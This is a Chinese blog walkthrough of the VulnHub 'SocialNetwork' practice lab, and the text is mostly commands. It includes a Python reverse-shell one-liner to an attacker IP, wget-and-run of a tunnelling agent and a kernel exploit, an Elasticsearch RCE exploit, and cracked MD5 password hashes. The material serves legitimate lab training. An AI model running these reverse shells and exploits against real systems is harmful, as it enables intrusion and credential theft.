vulnhub-BoredHackerBlog:SocialNetwork通关教程

最新推荐文章于 2024-06-11 17:37:07 发布
最新推荐文章于 2024-06-11 17:37:07 发布
阅读量1.5k 收藏 40
点赞数 47
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hot_milk1/article/details/136183242
版权

0x01靶场下载地址

https://download.vulnhub.com/boredhackerblog/medium_socnet.ova

0x02靶机目标

获得靶机root权限

0x03工具准备

0x04详细步骤

一、网络扫描

1.同网段主机扫描

arp-scan -l -I eth1

2.对目标靶机进行全端口扫描

nmap -p- 192.168.56.101

3.识别靶机端口开放的服务

nmap -p 22,5000 -sV 192.168.56.101

发现TCP5000端口,开放有Python2,Web服务

二、Web信息收集

1.用浏览器访问http://192.168.56.101:5000,但在页面上并没有发现有用的信息

2.对http://192.168.56.101:5000进行目录扫描

dirsearch -u http://192.168.56.101:5000

发现/admin目录进行访问

三、Web 命令执行漏洞与反弹Shell

1.浏览器访问http://192.168.56.101:5000/admin,发现可以执行命令

2.使用Python反弹shell

使用nc在Kali主机上监听TCP8686端口(端口任意指定)

nc -nvlp 8686

http://192.168.56.101:5000/admin输入Python Shell

import

socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",8686));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Tip:判断主机位Docker容器的两种方法
方法一:确认根目录下是否存在.dockerenv文件

ls /.dockerenv

方法二:查看/proc/1/cgroup是否存在docker目录

cat /proc/1/cgroup

四、内网穿透

1.内网扫描

  • ip address 发现内网段为172.17.0.3/16网段
  • 内网主机扫描,发现172.17.0.1,172.17.0.2,172.17.0.3为存活主机

for i in $(seq 1 254); do ping -c 1 172.17.0.$i; done

2.部署Venom内网穿透工具

  • 在Kali主机Venom目录启动Python3 Http Server

python3 -m http.server 80

  • 启动Venom管理端,监听本地9999端口

./admin_linux_x64 -lport 9999

  • 靶机部署Venom客户端

cd /tmp

wget -c http://192.168.56.101/agent_linux_x64

chmod +x agent_linux_x64

./agent_linux_x64 -rhost 192.168.56.101 -rport 9999

在Kali主机Venom管理端可以看到有主机上线

查看、控制Venom节点、启动socks隧道

五、挂Socks内网扫描

1.修改proxychains配置

vi /etc/proxychains4.conf

修改最后一行为:
socks5 127.0.0.1 1080

2.挂代理启动扫描,发现172.17.0.1,172.17.0.3相同,172.17.0.2存在9200端口

proxychains nmap -Pn -sT -sV 172.17.0.1

proxychains nmap -Pn -sT -sV 172.17.0.2

proxychains nmap -Pn -sT -sV 172.17.0.3

六、利用Elasticsearch获取目标靶机登录用户名和密码

1.搜索Elasticsearch漏洞

searchsploit Elasticsearch

2.复制36337.py到当前目录,通过查看该python脚本得知该使用python2

cp /usr/share/exploitdb/exploits/linux/remote/36337.py .

3.向Elasticsearch写入一条数据(如果不写入数据,攻击代码无法执行)

proxychains curl -XPOST '172.17.0.2:9200/twitter/user/yren' -d '{"name":"hgd"}'

4.挂proxychains攻击172.17.0.2 9200端口

proxychains python2 36337.py 172.17.0.2

5.查询用户身份,发现是root权限

6.在根目录下发现passwords文件,内含用户名一些用户名和密码

7.破解MD5加密明文(两种方法)

方法一:使用Hashcat破解

  • 根据Format提示,密码是由8位组成,前四位是数字,后四位是小写字母,可以是用Hashcat
    1. 把hash提取出来,保存为一个文件pwd.hash
    2. -m 0 指哈希类型是md5;-a 3 指掩码攻击;?d代表数字;?l代表小写字母
  • cat pwd.hash
    john:3f8184a7343664553fcb5337a3138814
    test:861f194e9d6118f3d942a72be3e51749
    admin:670c3bbc209a18dde5446e5e6c1f1d5b
    root:b3d34352fc26117979deabdf1b9b6354
    jane:5c158b60ed97c723b673529b8a3cf72b
    hashcat –username -m 0 -a 3 pwd.hash ?d?d?d?d?l?l?l?l –force
    hashcat –username -m 0 -a 3 pwd.hash ?d?d?d?d?l?l?l?l –force –show
    john:3f8184a7343664553fcb5337a3138814:1337hack
    test:861f194e9d6118f3d942a72be3e51749:1234test
    admin:670c3bbc209a18dde5446e5e6c1f1d5b:1111pass
    root:b3d34352fc26117979deabdf1b9b6354:1234pass
    jane:5c158b60ed97c723b673529b8a3cf72b:1234jane方法二:使用第三方密码查询平台(如:https://www.somd5.com/)获取明文密码
    1. 通过依次尝试,john:1337hack可以登录目标靶机
    2. 通过依次尝试,john:1337hack可以登录目标靶机

8.通过依次尝试,john:1337hack可以登录目标靶机

ssh john@192.168.56.101

七、Linux内核提权

1.尝试john用户提权,但提权失败

sudo -s //约等于sudo su

2.尝试内核提权

uname -a

  • 搜索关键字

考虑到

cp /usr/share/exploitdb/exploits/linux/local/37292.c .

注释掉37292.c的139-147行

gcc -o exp 37292.c

locate ofs-lib.so

cp /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so .

  • 将编译好的exp和ofs-lib.so上传至目标靶机

kali主机在tmp目录启动http server

python3 -m http.server 80

在靶机上下载exp和ofs-lib.so

cd /tmp

wget http://192.168.56.102/exp
wget http://192.168.56.102/ofs-lib.so

执行exp文件,提权成功

chmod +x exp

./exp

id

  • 如果运行exp报错,gcc或者glibc有关系,用docker拉个homebrew/ubuntu16.04,在这里面编译就行了,感谢大家观看!
Pumpkin_Bridge
关注
  • 47
    点赞
  • 40
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【VulnHub靶场】-- BOREDHACKERBLOG: SOCIAL NETWORK
laozhang338的博客
07-22 231
这个命令可以查看Linux 初始化进程 id:1 的 cgroup 中包含的文件,如果里面有 docker 镜像信息的时候,可以确定是 docker容器。目前我们只知道目标机器和我们在同一网段,所以我们要做一下当前网段的主机存活探测,找到目标的ip地址,也就是。中,但是接下来又对其他两台主机进行扫描,因为 kali 这些工具不能直接用在内网环境中,所以需要做隧道进行。现在代理服务是配置好了,但是我们的搭建代理的目标是让kali上的工具可以对目标进行操作,所以我们还需要挂载。,才能对另外两台主机进行渗透。
【VulnHub靶场】——BOREDHACKERBLOG: CLOUD AV
Demo不是emo的博客
11-05 5432
从上周开始制定了为期24周的打靶训练(每周一次),所以今天开始进行24次系统性打靶第二次训练,每次打靶后都会分享靶场攻略和总结的知识点
靶机渗透练习79-Venom
hirak0的博客
04-21 2534
靶机描述 靶机地址:https://www.vulnhub.com/entry/venom-1,701/ Description This machine was created for the OSCP Preparation.This box was created with virtualbox. For any queries please contact me on twitter: @avi0813. Enumeration is the Key. 一、搭建靶机环境 攻击机Kali:
Vulnhub靶机:BOREDHACKERBLOG_ CLOUD AV
LainWith的博客
06-18 1193
系列:BoredHackerBlog(此系列共4台) 发布日期:2020年03月29日 难度:初级-中级 靶机地址:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/ 内容简介: 这是本系列的第02次打靶,我选择了一个低难度级别的靶机。虽说难度级别为低,但是从还原整个渗透过程的角度来看,这个靶机非常全面。在这次打靶过程中,我们将使用到以下攻击手段:netdiscover主机发现 对于VulnHub靶机来说,出现“PCS Systemtech
social-network-laravel:Laravel社交网络
05-24
Laravel 8-社交网络 Laravel上的一个小型社交网络。 安装 cd project composer install (请参阅文件夹供应商) cd项目npm install (请参阅文件夹node_modules ) 克隆.env.example并重命名为.env ...
Social-Network:Social-Network-AngularJS-Practical-Project
06-04
社交网络Social-Network-AngularJS-Practical-Project
django-social-network:基于Django的社交网络
02-04
Django社交网络 开源社交网络 二手技术堆栈 当前功能: ...创建帖子并对特定帖子发表评论 当有人评论您的信息时收到通知 发送朋友请求并接受请求 与朋友实时聊天 屏幕截图 ... 表示支持 :glowing_star: 该项目!...
expressjs-developer-social-network:学习实验
07-11
git clone https://github.com/erikthedeveloper/expressjs-developer-social-network.git ThisExpressApp cd ThisExpressApp npm install && bower install # In separate tab(s) gulp npm start # Browse to ...
MERN-Social-Network:使用MERN堆栈构建社交网络
05-11
MERN社交网络 具有实现的MVP功能的MERN堆栈社交网络应用程序:用户身份验证,个人资料查看,发布,评论以及关注/取消关注。... 作为用户,我希望能够登录以便可以查看我的家庭供稿。 作为用户,我希望能够查看帖子,...
Vulnhub靶机:BOREDHACKERBLOG: SOCIAL NETWORK
LainWith的博客
06-16 1391
系列:Chronos(此系列共1台) 发布日期:2021年08月09日 难度:中级 学习:靶机地址:https://www.vulnhub.com/entry/chronos-1,735/netdiscover主机发现 对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。 根据22端口得知SSH版本,以及这是一台Ubuntu系统。 根据5000端口得知它是基于python开发的一个web服务。 访问网站,通过页面上的内容得知这是一个安全的匿名留言网站。 扔了几个XSS
Moriarty Corp靶场攻略
Ms08067安全实验室
04-15 2779
点击上方“蓝字”关注公众号获取最新信息!本文作者:a-running-snail(贝塔安全实验室)Moriarty Corp靶场环境包含一台外网服务器和三台内网主机,攻击者需先对外网服务...
vlunhub- BoredHackerBlog Moriarty Corp
GALi_233的博客
08-08 848
Description Hello Agent. You’re here on a special mission. A mission to take down one of the biggest weapons suppliers which is Moriarty Corp. Enter flag{start} into the webapp to get started! Notes: Web panel is on port 8000 (not in scope. Don’t attack)
VulnHub实战篇五:Cloud AV靶机渗透记录
a1004070060的博客
04-18 1600
前言:Cloud AV是BoredHackerBlog在2020年3月29日发布在Vulnhub上的最新靶机,至今还热乎着(没有找到可参考的wp)。早在今年的4月初我就把它下载了下来,但是由于我忽略一些显而易见的线索而卡了很长时间,在这期间我完成了DC-1靶机的测试,同时更加深入地了解了SUID提权。在此基础上,今天晚上再次打开Colud AV,我找到了之前被忽略的关键点并完成了对该靶机的提权,...
BoredHackerBlog-Social Network
94小菜
08-11 601
Name:BoredHackerBlog-Social Network level:medium 文章目录总结 主机发现 netdiscover -i eht0 -r 192.168.43.1/24 目标锁定Vmware几个主机,地址193为存活主机,确定为靶机 端口扫描 5000端口为web服务,Werkzeug是python语言开发的底层框架,服务器编程语言是python 目录扫描 dirsearch -u 192.168.43.193:5000 管理后台命令执行,反弹shell python反
[vulnerhub] easy_cloudav write up
CN_DS的博客
08-14 509
摘要 0x1 靶机:192.168.88.13(靶机下载地址:https://download.vulnhub.com/boredhackerblog/easy_cloudantivirus.ova) 攻击机:192.168.88.8 每周六都会跟着苑老师学习一片打靶课程, 然后做一篇writeup。废话不多说,开干!! 我的靶机安装在virtualbox上,攻击机使用的是kali,安装在vwmare上。使用的是桥接。链接到手动创建的...
vulnhub靶场-BoredHackerBlog: Cloud AV
qq_42947816的博客
05-10 888
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
[靶机渗透笔记] BOREDHACKERBLOG: MORIARTY CORP
H4ppyD0g的博客
01-23 2402
靶机链接https://www.vulnhub.com/entry/boredhackerblog-moriarty-copy%2C456/ 确定靶机 扫描存活主机 sudo nmap -sP 192.168.5.5/24 -sP 进行ping扫描 扫描具体信息 sudo nmap 192.168.5.5/24 确定靶机ip为192.168.5.6,根据vulhub这个靶机的信息提示,访问8000端口。 根据提示先输入flag{start},然后给出新的提示,攻击80端口。 文件包含 两个按钮,随便点
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8287
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
数字时代网络安全即服务的兴起
最新发布
网络研究观
06-11 535
网络安全即服务是一种通过基于云的服务来管理安全需求的综合方法。
Consensus reaching with non-cooperative behavior management for personalized individual semantics-based social network group decision making这篇文献的PDF
07-17
非常抱歉,作为AI助手,我没有直接访问和提供特定文献的能力。您可以尝试以下几种方法来获取您所需的文献PDF: 1. 学术搜索引擎:使用学术搜索引擎(如Google 学术、Microsoft 学术或Scopus)搜索文献标题或关键词,看看是否能找到该文献的PDF版本。 2. 学校图书馆:如果您是学生或教职工,可以尝试访问您所在学校的图书馆网站,使用其提供的文献数据库搜索功能来查找文献。 3. 作者或机构的网站:访问文献的作者或机构的官方网站,看看是否提供了该文献的PDF下载或相关联系方式。 4. 向作者发送请求:如果您无法找到文献的PDF版本,您可以尝试通过电子邮件或其他方式联系文献的作者,请求他们提供该文献的副本。 请注意,获取特定文献的PDF可能需要付费或需要特定的访问权限。希望以上方法对您有所帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值